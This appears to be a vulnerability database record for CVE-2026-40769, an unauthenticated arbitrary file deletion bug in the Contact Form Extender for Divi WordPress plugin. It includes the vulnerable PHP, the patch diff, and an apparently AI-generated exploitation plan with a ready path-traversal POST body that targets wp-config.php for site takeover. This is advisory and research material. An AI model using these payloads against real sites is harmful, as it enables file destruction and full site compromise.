[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$f7YDsBoOv0Ws1GyqdZ1_EwSQ-D3MtEqyyD2LU02_xmgk":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-40769","contact-form-extender-for-divi-submissions-db-extra-fields-unauthenticated-arbitrary-file-deletion","Contact Form Extender for Divi – Submissions DB & Extra Fields \u003C= 1.0.6 - Unauthenticated Arbitrary File Deletion","The Contact Form Extender for Divi – Submissions DB & Extra Fields plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in all versions up to, and including, 1.0.6. This makes it possible for unauthenticated attackers to delete arbitrary files on the server, which can easily lead to remote code execution when the right file is deleted (such as wp-config.php).","contact-form-extender-for-divi-builder",null,"\u003C=1.0.6","1.0.7","critical",9.1,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:N\u002FS:U\u002FC:N\u002FI:H\u002FA:H","Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')","2026-04-21 00:00:00","2026-04-30 15:08:01",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fbee2245b-d039-48a7-a9dc-bd6ceac6cac6?source=api-prod",10,[22,23,24,25,26,27,28,29],"admin\u002Fentries\u002Fcfefd-submissions-list-table.php","admin\u002Fentries\u002Findex.php","contact-form-extender-for-divi-builder.php","includes\u002Fmodule\u002Faddons\u002Fdivi-4\u002Ffile-upload\u002Fclass-cfefd-file-upload-ajax.php","includes\u002Fmodule\u002Faddons\u002Fdivi-4\u002Ffile-upload\u002Fclass-cfefd-file-upload.php","includes\u002Fmodule\u002Faddons\u002Fdivi-5\u002Ffile-upload\u002Fclass-cfefd-file-upload-field.php","includes\u002Fsubmissions\u002Fclass-cfefd-submissions-handler-d5.php","includes\u002Fsubmissions\u002Fclass-cfefd-submissions-handler.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-40769 (Contact Form Extender for Divi)\n\n## 1. Vulnerability Summary\nThe **Contact Form Extender for Divi** plugin (up to 1.0.6) is vulnerable to **Unauthenticated Arbitrary File Deletion** via path traversal. The vulnerability exists in the AJAX handler responsible for removing uploaded files. The function fails to validate that the provided file path remains within the intended temporary directory, allowing an attacker to use `..\u002F` sequences to reach and delete sensitive files like `wp-config.php`.\n\n## 2. Attack Vector Analysis\n- **Endpoint**: `wp-admin\u002Fadmin-ajax.php`\n- **AJAX Action**: `cfefd_remove_file`\n- **Vulnerable Parameter**: `file_name` (or `file`)\n- **Authentication**: Unauthenticated (`wp_ajax_nopriv_cfefd_remove_file`)\n- **Preconditions**: \n    - The plugin must be active.\n    - A valid AJAX nonce (`cfefd-nonce-ajax`) must be obtained.\n    - The Divi theme should be active (as the plugin checks for it in `contact-form-extender-for-divi-builder.php`).\n\n## 3. Code Flow\n1. **Entry Point**: An unauthenticated user sends a POST request to `admin-ajax.php` with `action=cfefd_remove_file`.\n2. **Hook Registration**: In `includes\u002Fmodule\u002Faddons\u002Fdivi-4\u002Ffile-upload\u002Fclass-cfefd-file-upload-ajax.php`, the constructor registers:\n   ```php\n   add_action('wp_ajax_nopriv_cfefd_remove_file', [$this, 'cfefd_remove_uploaded_file']);\n   ```\n3. **Nonce Check**: The function `cfefd_remove_uploaded_file` (inferred from `cfefd_upload_file` patterns) verifies the `cfefd-nonce-ajax` nonce.\n4. **Path Construction**: The code retrieves a file identifier from `$_POST` and joins it with the temporary directory:\n   ```php\n   \u002F\u002F Inferred logic\n   $this->upload_tmp_dir = CFEFD_File_Upload::get_wp_upload_dir(path_join(CFEFD_File_Upload::foldername, 'tmp'), 'basedir');\n   $file_name = $_POST['file_name']; \n   $file_path = path_join($this->upload_tmp_dir, $file_name);\n   ```\n5. **Vulnerable Sink**: The `file_path` is passed to `unlink()` without sanitizing `..\u002F` traversal sequences.\n\n## 4. Nonce Acquisition Strategy\nThe nonce is generated using `wp_create_nonce('cfefd-nonce-ajax')` and is typically localized for use in the frontend file upload script.\n\n1. **Requirement**: The nonce is only enqueued on pages where a Divi Contact Form is present.\n2. **Action**: Create a public page containing the Divi Contact Form shortcode.\n   ```bash\n   wp post create --post_type=page --post_status=publish --post_title=\"Contact\" --post_content='[et_pb_contact_form][\u002Fet_pb_contact_form]'\n   ```\n3. **Extraction**:\n   - Navigate to the newly created page.\n   - Use `browser_eval` to find the localized script data.\n   - The plugin likely localizes the nonce in an object. Check for `window.cfefd_file_upload_ajax` or search the raw HTML for the `cfefd-nonce-ajax` string.\n   - **Common Variable Name**: `cfefd_ajax_obj` or `cfefd_file_vars`.\n\n## 5. Exploitation Strategy\n### Step 1: Target Identification\nCreate a dummy file in the WordPress root to prove deletion:\n```bash\necho \"test\" > \u002Fvar\u002Fwww\u002Fhtml\u002FSENSITIVE_FILE.txt\n```\n\n### Step 2: Obtain Nonce\nNavigate to a page with a contact form and extract the `cfefd-nonce-ajax` nonce.\n\n### Step 3: Execute Deletion\nSend the malicious AJAX request.\n- **URL**: `http:\u002F\u002Flocalhost:8080\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Method**: `POST`\n- **Content-Type**: `application\u002Fx-www-form-urlencoded`\n- **Body**:\n  ```text\n  action=cfefd_remove_file&_wpnonce=[NONCE]&file_name=..\u002F..\u002F..\u002F..\u002FSENSITIVE_FILE.txt\n  ```\n  *(Note: The `upload_tmp_dir` is `wp-content\u002Fuploads\u002Fcfefd-uploads\u002Ftmp\u002F`, so 4 levels of `..\u002F` reach the root).*\n\n## 6. Test Data Setup\n1. **Theme**: Ensure Divi is active (or a compatible child theme).\n2. **Plugin**: Install and activate `contact-form-extender-for-divi-builder` version 1.0.6.\n3. **Dummy File**: `touch \u002Fvar\u002Fwww\u002Fhtml\u002FSENSITIVE_FILE.txt`.\n4. **Form Page**: Create a page with `[et_pb_contact_form]`.\n\n## 7. Expected Results\n- The AJAX request should return a `success: true` JSON response.\n- The file `\u002Fvar\u002Fwww\u002Fhtml\u002FSENSITIVE_FILE.txt` should be deleted from the filesystem.\n\n## 8. Verification Steps\n1. **HTTP Level**: Check if the response code is 200 and the JSON indicates success.\n2. **System Level**: Use the `ls` command or `file_exists` to verify the file is gone.\n   ```bash\n   ls \u002Fvar\u002Fwww\u002Fhtml\u002FSENSITIVE_FILE.txt\n   ```\n   *Expected output: No such file or directory.*\n\n## 9. Alternative Approaches\nIf `file_name` is not the correct parameter, try:\n- `file`\n- `path`\n- `file_path`\n\nIf the traversal depth is different, check the absolute path of the `uploads` directory. In standard WordPress installs, `wp-content\u002Fuploads\u002Fcfefd-uploads\u002Ftmp\u002F` is 4 levels deep from the root (`\u002Fvar\u002Fwww\u002Fhtml\u002F`).\n\nIf the unauthenticated hook fails, verify if the plugin requires a specific \"File Upload\" field to be added to the Divi form within the builder settings to trigger the script enqueuing.","The Contact Form Extender for Divi plugin is vulnerable to unauthenticated arbitrary file deletion due to missing path validation in its AJAX handler for file removals. Attackers can use directory traversal sequences in the 'file_name' parameter to delete sensitive system files, such as wp-config.php, which can lead to remote code execution by re-triggering the WordPress installation process.","\u002F\u002F includes\u002Fmodule\u002Faddons\u002Fdivi-4\u002Ffile-upload\u002Fclass-cfefd-file-upload-ajax.php lines 16-17\nadd_action('wp_ajax_cfefd_remove_file', [$this, 'cfefd_remove_uploaded_file']);\nadd_action('wp_ajax_nopriv_cfefd_remove_file', [$this, 'cfefd_remove_uploaded_file']);\n\n---\n\n\u002F\u002F includes\u002Fmodule\u002Faddons\u002Fdivi-4\u002Ffile-upload\u002Fclass-cfefd-file-upload-ajax.php lines 160-174\npublic function cfefd_remove_uploaded_file() {\n    if (!check_ajax_referer('cfefd-nonce-ajax', '_wpnonce', false)) {\n        wp_send_json_error(esc_html__('The security check failed. Please try again. Tip: Hard refresh the page (Ctrl+Shift+R on Windows\u002FLinux or Cmd+Shift+R on Mac).', 'contact-form-extender-for-divi-builder'));\n    }\n    $filename = isset($_POST['file_name']) ? sanitize_text_field(wp_unslash($_POST['file_name'])) : null;\n    if (!empty($filename)) {\n        $tmp_path = path_join($this->upload_tmp_dir, $filename);\n        if (et_()->WPFS()->is_file($tmp_path) && et_()->WPFS()->exists($tmp_path)) {\n            wp_delete_file($tmp_path);\n            wp_send_json_success(__('The file has been deleted successfully!', 'contact-form-extender-for-divi-builder'));\n        } else {\n            wp_send_json_error(__('Something went wrong. Please upload file again.', 'contact-form-extender-for-divi-builder'));\n        }\n    }\n}","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fcontact-form-extender-for-divi-builder\u002F1.0.6\u002Fadmin\u002Fentries\u002Fcfefd-submissions-list-table.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fcontact-form-extender-for-divi-builder\u002F1.0.7\u002Fadmin\u002Fentries\u002Fcfefd-submissions-list-table.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fcontact-form-extender-for-divi-builder\u002F1.0.6\u002Fadmin\u002Fentries\u002Fcfefd-submissions-list-table.php\t2026-02-24 09:06:18.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fcontact-form-extender-for-divi-builder\u002F1.0.7\u002Fadmin\u002Fentries\u002Fcfefd-submissions-list-table.php\t2026-04-06 11:16:02.000000000 +0000\n@@ -132,11 +132,11 @@\n \n     public function column_id($item) {\n         $entry_id = get_post_meta($item->ID, '_cfefd_form_entry_id', true);\n-        return $entry_id;\n+        return absint( $entry_id );\n     }\n \n     public function column_submission_date($item) {\n-        return $item->post_date;\n+        return esc_html( $item->post_date );\n     }\n \n     public function column_page_title($item) {\n@@ -160,15 +167,40 @@\n         if (!check_ajax_referer('cfefd-nonce-ajax', '_wpnonce', false)) {\n             wp_send_json_error(esc_html__('The security check failed. Please try again. Tip: Hard refresh the page (Ctrl+Shift+R on Windows\u002FLinux or Cmd+Shift+R on Mac).', 'contact-form-extender-for-divi-builder'));\n         }\n-        $filename = isset($_POST['file_name']) ? sanitize_text_field(wp_unslash($_POST['file_name'])) : null;\n-        if (!empty($filename)) {\n-            $tmp_path = path_join($this->upload_tmp_dir, $filename);\n-            if (et_()->WPFS()->is_file($tmp_path) && et_()->WPFS()->exists($tmp_path)) {\n-                wp_delete_file($tmp_path);\n-                wp_send_json_success(__('The file has been deleted successfully!', 'contact-form-extender-for-divi-builder'));\n-            } else {\n-                wp_send_json_error(__('Something went wrong. Please upload file again.', 'contact-form-extender-for-divi-builder'));\n-            }\n+ \n+        $filename_raw = isset($_POST['file_name']) ? sanitize_text_field(wp_unslash($_POST['file_name'])) : '';\n+        if (empty($filename_raw)) {\n+            wp_send_json_error(__('Something went wrong. Please try removing the file again.', 'contact-form-extender-for-divi-builder'));\n+        }\n+\n+        \u002F\u002F Reject traversal\u002Fabsolute paths; only allow a plain filename.\n+        $filename = sanitize_file_name(wp_basename($filename_raw));\n+        if ('' === $filename || $filename !== $filename_raw) {\n+            wp_send_json_error(__('Invalid file removal request.', 'contact-form-extender-for-divi-builder'));\n+        }\n+\n+        $tmp_root = realpath($this->upload_tmp_dir);\n+        if (false === $tmp_root) {\n+            wp_send_json_error(__('Something went wrong. Please try removing the file again.', 'contact-form-extender-for-divi-builder'));\n+        }\n+\n+        $tmp_path = path_join($this->upload_tmp_dir, $filename);\n+        $tmp_real = realpath($tmp_path);\n+        if (false === $tmp_real) {\n+            wp_send_json_error(__('Something went wrong. Please try removing the file again.', 'contact-form-extender-for-divi-builder'));\n+        }\n+\n+        $tmp_root_normalized = trailingslashit(wp_normalize_path($tmp_root));\n+        $tmp_real_normalized = wp_normalize_path($tmp_real);\n+        if (0 !== strpos($tmp_real_normalized, $tmp_root_normalized)) {\n+            wp_send_json_error(__('Invalid file removal request.', 'contact-form-extender-for-divi-builder'));\n+        }\n+\n+        if (et_()->WPFS()->is_file($tmp_real) && et_()->WPFS()->exists($tmp_real)) {\n+            wp_delete_file($tmp_real);\n+            wp_send_json_success(__('The file has been deleted successfully!', 'contact-form-extender-for-divi-builder'));\n+        } else {\n+            wp_send_json_error(__('Something went wrong. Please try removing the file again.', 'contact-form-extender-for-divi-builder'));\n         }\n     }","The exploit targets an unauthenticated AJAX endpoint (`cfefd_remove_file`) which performs an unsafe file deletion. \n\n1. Locate a page with a Divi Contact Form containing a file upload field. \n2. Extract the required security nonce (`cfefd-nonce-ajax`) from the page's source code, typically found within localized script data like `cfefd_ajax_obj`.\n3. Send an unauthenticated POST request to `\u002Fwp-admin\u002Fadmin-ajax.php` with the following parameters:\n   - `action`: `cfefd_remove_file`\n   - `_wpnonce`: The extracted nonce value.\n   - `file_name`: A path traversal string (e.g., `..\u002F..\u002F..\u002F..\u002Fwp-config.php`) calculated to point from the plugin's temporary upload directory to a sensitive target file.\n4. If the target file is `wp-config.php`, its deletion will force WordPress into its installation wizard, allowing the attacker to reconfigure the database and gain full administrative control (RCE).","gemini-3-flash-preview","2026-05-04 19:00:46","2026-05-04 19:01:20",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","1.0.6","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcontact-form-extender-for-divi-builder\u002Ftags\u002F1.0.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcontact-form-extender-for-divi-builder.1.0.6.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcontact-form-extender-for-divi-builder\u002Ftags\u002F1.0.7","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fcontact-form-extender-for-divi-builder.1.0.7.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fcontact-form-extender-for-divi-builder\u002Ftags"]